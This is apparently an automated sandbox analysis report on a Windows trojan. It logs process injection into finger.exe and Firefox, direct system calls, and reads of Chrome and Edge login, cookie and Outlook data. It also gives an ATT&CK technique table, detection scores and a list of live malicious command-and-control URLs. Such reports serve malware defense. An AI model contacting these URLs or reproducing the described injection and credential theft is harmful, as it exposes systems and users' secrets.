                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E0770 mov eax, dword ptr fs:[00000030h]8_2_014E0770
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01500710 mov eax, dword ptr fs:[00000030h]8_2_01500710
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150C700 mov eax, dword ptr fs:[00000030h]8_2_0150C700
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D0710 mov eax, dword ptr fs:[00000030h]8_2_014D0710
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154C730 mov eax, dword ptr fs:[00000030h]8_2_0154C730
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150273C mov eax, dword ptr fs:[00000030h]8_2_0150273C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150273C mov ecx, dword ptr fs:[00000030h]8_2_0150273C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150273C mov eax, dword ptr fs:[00000030h]8_2_0150273C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150C720 mov eax, dword ptr fs:[00000030h]8_2_0150C720
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150C720 mov eax, dword ptr fs:[00000030h]8_2_0150C720
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014DC7C0 mov eax, dword ptr fs:[00000030h]8_2_014DC7C0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015507C3 mov eax, dword ptr fs:[00000030h]8_2_015507C3
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F27ED mov eax, dword ptr fs:[00000030h]8_2_014F27ED
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F27ED mov eax, dword ptr fs:[00000030h]8_2_014F27ED
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014F27ED mov eax, dword ptr fs:[00000030h]8_2_014F27ED
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0155E7E1 mov eax, dword ptr fs:[00000030h]8_2_0155E7E1
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D47FB mov eax, dword ptr fs:[00000030h]8_2_014D47FB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D47FB mov eax, dword ptr fs:[00000030h]8_2_014D47FB
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0157678E mov eax, dword ptr fs:[00000030h]8_2_0157678E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D07AF mov eax, dword ptr fs:[00000030h]8_2_014D07AF
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_015847A0 mov eax, dword ptr fs:[00000030h]8_2_015847A0
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EC640 mov eax, dword ptr fs:[00000030h]8_2_014EC640
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01502674 mov eax, dword ptr fs:[00000030h]8_2_01502674
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150A660 mov eax, dword ptr fs:[00000030h]8_2_0150A660
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0150A660 mov eax, dword ptr fs:[00000030h]8_2_0150A660
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159866E mov eax, dword ptr fs:[00000030h]8_2_0159866E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0159866E mov eax, dword ptr fs:[00000030h]8_2_0159866E
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E260B mov eax, dword ptr fs:[00000030h]8_2_014E260B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E260B mov eax, dword ptr fs:[00000030h]8_2_014E260B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E260B mov eax, dword ptr fs:[00000030h]8_2_014E260B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E260B mov eax, dword ptr fs:[00000030h]8_2_014E260B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E260B mov eax, dword ptr fs:[00000030h]8_2_014E260B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E260B mov eax, dword ptr fs:[00000030h]8_2_014E260B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014E260B mov eax, dword ptr fs:[00000030h]8_2_014E260B
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_01512619 mov eax, dword ptr fs:[00000030h]8_2_01512619
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_0154E609 mov eax, dword ptr fs:[00000030h]8_2_0154E609
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014D262C mov eax, dword ptr fs:[00000030h]8_2_014D262C
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exeCode function: 8_2_014EE627 mov eax, dword ptr fs:[00000030h]8_2_014EE627
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtOpenKeyEx: Direct from: 0x77672B9C
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtProtectVirtualMemory: Direct from: 0x77672F9C
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtCreateFile: Direct from: 0x77672FEC
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtOpenFile: Direct from: 0x77672DCC
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtTerminateThread: Direct from: 0x77672FCC
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtProtectVirtualMemory: Direct from: 0x77667B2E
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtQueryInformationToken: Direct from: 0x77672CAC
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtAllocateVirtualMemory: Direct from: 0x77672BEC
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtDeviceIoControlFile: Direct from: 0x77672AEC
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtQuerySystemInformation: Direct from: 0x776748CC
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtQueryAttributesFile: Direct from: 0x77672E6C
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtSetInformationThread: Direct from: 0x77672B4C
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtOpenSection: Direct from: 0x77672E0C
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtQueryVolumeInformationFile: Direct from: 0x77672F2C
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtAllocateVirtualMemory: Direct from: 0x776748EC
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtSetInformationThread: Direct from: 0x776663F9
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtReadVirtualMemory: Direct from: 0x77672E8C
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtCreateKey: Direct from: 0x77672C6C
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtClose: Direct from: 0x77672B6C
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtWriteVirtualMemory: Direct from: 0x7767490C
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtAllocateVirtualMemory: Direct from: 0x77673C9C
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtDelayExecution: Direct from: 0x77672DDC
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtCreateUserProcess: Direct from: 0x7767371C
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtQuerySystemInformation: Direct from: 0x77672DFC
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtQueryInformationProcess: Direct from: 0x77672C26
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtResumeThread: Direct from: 0x77672FBC
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtReadFile: Direct from: 0x77672ADC
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtAllocateVirtualMemory: Direct from: 0x77672BFC
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtResumeThread: Direct from: 0x776736AC
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtSetInformationProcess: Direct from: 0x77672C5C
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtMapViewOfSection: Direct from: 0x77672D1C
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtNotifyChangeKey: Direct from: 0x77673C2C
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtWriteVirtualMemory: Direct from: 0x77672E3C
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe NtCreateMutant: Direct from: 0x776735CC
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe Section loaded: NULL target: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe Section loaded: NULL target: C:\Windows\SysWOW64\finger.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe protection: read write
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\finger.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\finger.exe Thread register set: target process: 6648
                Source: C:\Windows\SysWOW64\finger.exe Thread APC queued: target process: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe Process created: C:\Users\user\Desktop\wSoShbuXnJ.exe "C:\Users\user\Desktop\wSoShbuXnJ.exe"
                Source: C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe Process created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                Source: C:\Windows\SysWOW64\finger.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: RAdsmABlJtKpzt.exe, 0000000A.00000000.1710784957.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000A.00000002.3139916290.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3140264877.0000000001A30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: RAdsmABlJtKpzt.exe, 0000000A.00000000.1710784957.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000A.00000002.3139916290.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3140264877.0000000001A30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: RAdsmABlJtKpzt.exe, 0000000A.00000000.1710784957.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000A.00000002.3139916290.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3140264877.0000000001A30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Manager
                Source: RAdsmABlJtKpzt.exe, 0000000A.00000000.1710784957.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000A.00000002.3139916290.0000000001AC0000.00000002.00000001.00040000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3140264877.0000000001A30000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe Queries volume information: C:\Users\user\Desktop\wSoShbuXnJ.exe VolumeInformation
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\wSoShbuXnJ.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

Source: Yara match | File source: 8.2.wSoShbuXnJ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.wSoShbuXnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1788457173.0000000001380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3140404421.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3140545475.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3140592825.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3140429074.0000000004590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1795225948.0000000002DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\finger.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\finger.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

Source: Yara match | File source: 8.2.wSoShbuXnJ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.wSoShbuXnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1788457173.0000000001380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3140404421.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3140545475.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.3140592825.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3140429074.0000000004590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1795225948.0000000002DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 312 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 312 Process Injection | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 113 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
[Behavior graph (image not reproduced): Behavior Graph ID: 1588797, Sample: wSoShbuXnJ.exe, Startdate: 11/01/2025, Architecture: WINDOWS, Score: 100. Process chain: wSoShbuXnJ.exe (started) -> wSoShbuXnJ.exe (started) -> RAdsmABlJtKpzt.exe (injected) -> finger.exe (started) -> RAdsmABlJtKpzt.exe (injected) and firefox.exe (started).]

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| wSoShbuXnJ.exe | 76% | Virustotal | | Browse |
| wSoShbuXnJ.exe | 71% | ReversingLabs | Win32.Trojan.Leonem | |
| wSoShbuXnJ.exe | 100% | Joe Sandbox ML | | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| http://elinor.club/1ne4/?rFbdy=Xmf7DtAQ/BnKPHUt3tFFF | 100% | Avira URL Cloud | malware | |
| http://www.graviton.energy/images/favicons/manifest.json | 0% | Avira URL Cloud | safe | |
| http://www.graviton.energy/y54z/?rFbdy=oqT6mesMFtjVx9Zo+WJYx+2EviEW1FInvVPBS1/+zHYUGg1LXtrFdHCKa7buL2o/Gnc6meWbbP401AFPslg2Utdxtkuh/i2NXcwPRnV0pzGWMtWrhQ==&UPxHl=S80HqRlhn | 100% | Avira URL Cloud | malware | |
| http://www.ausyva4.top/p9tq/ | 100% | Avira URL Cloud | malware | |
| https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd | 0% | Avira URL Cloud | safe | |
| http://www.graviton.energy/images/favicons/favicon-32x32.png | 0% | Avira URL Cloud | safe | |
| http://www.graviton.energy/images/logo-hosttech.svg | 0% | Avira URL Cloud | safe | |
| http://www.elinor.club/1ne4/ | 100% | Avira URL Cloud | malware | |
| http://www.graviton.energy/images/favicons/browserconfig.xml | 0% | Avira URL Cloud | safe | |
| http://www.primespot.live/b8eq/?rFbdy=gCO4eBiOGzjIUF4Ojd1mJSXRG6iw/sOo1+eSlxtvQuGR+yQgcmFlfWYEu8/uSxX90okqxX/f1dseedlMe+CxOjcLE64JXGvlhnvggg9FHXGMXdp+Vw==&UPxHl=S80HqRlhn | 100% | Avira URL Cloud | malware | |
| http://www.graviton.energy/css/app.css | 0% | Avira URL Cloud | safe | |
| http://www.graviton.energy/images/favicons/favicon.ico | 0% | Avira URL Cloud | safe | |
| http://www.e8af.xyz | 100% | Avira URL Cloud | malware | |
| http://www.btblxhh.top/dp9c/ | 0% | Avira URL Cloud | safe | |
